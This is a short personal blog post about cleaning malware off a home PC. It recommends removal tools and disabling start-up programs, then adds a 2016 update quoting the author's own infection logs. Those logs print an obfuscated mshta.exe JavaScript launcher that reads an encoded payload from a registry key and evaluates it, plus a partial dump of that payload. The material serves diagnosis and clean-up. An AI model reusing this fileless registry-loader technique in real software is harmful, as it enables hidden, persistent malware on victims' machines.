Search This Blog

Thursday, 6 May 2010

so you’ve looked at too many dodgy websites?


I've recently had a few people say to me “I keep getting these popups coming up on my computer” , “my internet is slow” or “my computer keeps doing funny things”
well 99% of the time its because you have malware on your computer from looking at sites which exploit vulnerabilities in your web browser (or you have clicked on a dodge link)
either way how it happens doesn't really help once your computer is infected with malware. However don’t stress! there are some cool little tools and steps which you can use to bring your computer back from the brink.
combofix and malware bytes are ace apps to remove malware which you can download from here and here
I'm not going to go into details on how to use these tools since you can find tutorials on this which can be found here:

One thing I do recommend you do before starting the above scans is to disable all of your start-up programs and reboot your computer. You can do this by:
- Start- > Run –> msconfig
- Click the start-up tab –> Disable All –> Apply
- Reboot your computer



This will stop any nasty application from starting which may prevent you from completing your scan.
I also recommend avast antivirus which is free and works a charm! You can download it from here
Good luck!! (“,)

--UPDATE 29/8/2016--

After having my computers antivirus going crazy (see below). I came across this article which put me onto FRST64.exe which outputs text files similar to HijackThis of your systems registry and configurations which helped identify a rogue registry entry.

ANTIVIRUS LOG:
8/28/2016 1:20:17 PM Deleted computer C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\e95688\351098.bat Trojan-PoweLike!bat (Trojan)


FRST64 ADDITIONAL.TXT LOG:
HKU\S-1-5-21-1343024091-879983540-725345543-353852\Software\Classes\5faa59: "C:\windows\system32\mshta.exe" "javascript:Agz6G3="u6fd3P";zI9=new ActiveXObject("WScript.Shell");MIhcJ62c="S";im4sq=zI9.RegRead("HKCU\\software\\wqsrljgxw\\hxzhyjrthx");tU7cy="a";eval(im4sq);uGe8gIi="W8O1iRIP";" <===== ATTENTION



REGISTRY LINK FROM ABOVE:
[HKEY_CURRENT_USER\SOFTWARE\wqsrljgxw]
"ahoigdbva"="¡– ‡¯ òʹ#š¾âŠÊl · Ëqçÿé¶)¿ñK&§ÚùL ouæ
ጔ¤5ØÞUî?ls†Ý¶ÅÚ$\"=Ñy|”ÿׂ „ha¹Ïä1®óB ?¶sZ] GíšTK]\\·­"
"hxzhyjrthx"="LONGSTRING\"ZHdGIVI32sNP1VbF0hnRG4MJzHuCbQkrR9HMWQOVS4zT\";PwJqcOXUYB7vlCXYwLUWc3LOy=\"WOA8CYMIP4KNlWyXFa491bjXVx7Nkz4Uif\";MLXMiaLpJJuDkQpC9ckm=\"FHzfEhj7fuxeoTaXfvFshrKWmJjPl1l5MotArTMccA02y\";UyXPsUybcHukTaYbnK9Fz=\"CtWJmrM6depmg1Ul1gpM\";FtZgLYezKzke6LTTVpbwtfZA=\"hXeP6Qat5LngcDhbGUfmFPa46qXyKG6Q1\";Q1ITR3c=\"\";for(n7eb5oWpw=0;n7eb5oWpw
"sycsxfogs"="894"
"ijvq"="BD922737E41209AD"
"umga"="1469255575"
"yraycv"="Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
"jpxuz"="LONGSTRING"

No comments:

Post a comment